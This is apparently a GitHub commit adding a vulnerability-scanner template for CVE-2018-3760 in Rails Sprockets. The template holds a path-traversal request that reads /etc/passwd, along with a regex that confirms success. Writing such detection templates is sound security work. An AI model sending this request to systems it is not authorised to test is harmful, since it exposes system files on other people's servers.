CVE-2018-3760 Rails

Sprockets<=3.7.1
patch-1
$root: Whoami 2020-04-05 23:31:09 +05:30 committed by GitHub
parent 7aec74cf8d
commit d20aaae0fd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 19 additions and 0 deletions

19
cves/CVE-2018-3760.yaml Normal file
View File

@ -0,0 +1,19 @@
id: Rails CVE-2018-3760
info:
name: Rails cve-2018-3760
author: 0xrudra
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body